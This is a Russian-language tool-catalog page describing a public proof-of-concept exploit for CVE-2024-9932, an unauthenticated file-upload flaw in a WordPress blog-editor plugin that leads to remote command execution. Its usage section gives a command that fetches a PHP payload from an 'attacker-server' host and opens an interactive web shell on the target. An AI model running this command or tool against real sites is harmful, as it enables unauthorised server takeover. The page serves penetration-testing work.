Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
0-click-RCE-Exploit-for-CVE-2024-9932 — Неаутентифицированный 0-click RCE-эксплойт для CVE-2024-9932. Использует уязвимость произвольной загрузки файлов в плагине Wux Blog Editor для WordPress, чтобы загрузить удалённый PHP-payload, определить операционную систему цели и получить удалённое выполнение команд через интерактивный web-shell. | Kitploit
Инструменты/GitHubGitHub/joshuaprovoste/0-click-rce-exploit-for-cve-2024-9932
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
GitHub
joshuaprovoste/0-click-rce-exploit-for-cve-2024-9932

0-click-RCE-Exploit-for-CVE-2024-9932

Репозиторий
27 месяцев назадЕщё не проверено

Описание

Неаутентифицированный 0-click RCE-эксплойт для CVE-2024-9932. Использует уязвимость произвольной загрузки файлов в плагине Wux Blog Editor для WordPress, чтобы загрузить удалённый PHP-payload, определить операционную систему цели и получить удалённое выполнение команд через интерактивный web-shell.

Поделиться

CVE-2024-9932 / 0-Click RCE Эксплойт

  • Автор: Joshua Provoste
  • https://x.com/JoshuaProvoste/status/1858329238153072668

CVE-2024-9932

Этот репозиторий содержит эксплойт proof-of-concept для CVE-2024-9932 — неаутентифицированной уязвимости произвольной загрузки файлов в плагине Wux Blog Editor для WordPress, приводящей к удалённому выполнению команд (RCE).

Что делает скрипт

Скрипт использует уязвимый REST-эндпоинт для загрузки удалённого PHP payload без аутентификации. После загрузки он восстанавливает итоговое местоположение файла, определяет операционную систему цели и предоставляет интерактивную удалённую оболочку для выполнения команд.

Использование

root@kitploit:~
python CVE-2024-9932.py --target http://target-wordpress-site --payload http://attacker-server/cmd.php --payload_name cmd.php

После выполнения скрипт загружает payload, подтверждает его доступность, определяет ОС и переходит в интерактивную оболочку.

Примечания

  • Аутентификация не требуется (pre-auth / 0-click).
Скачать инструмент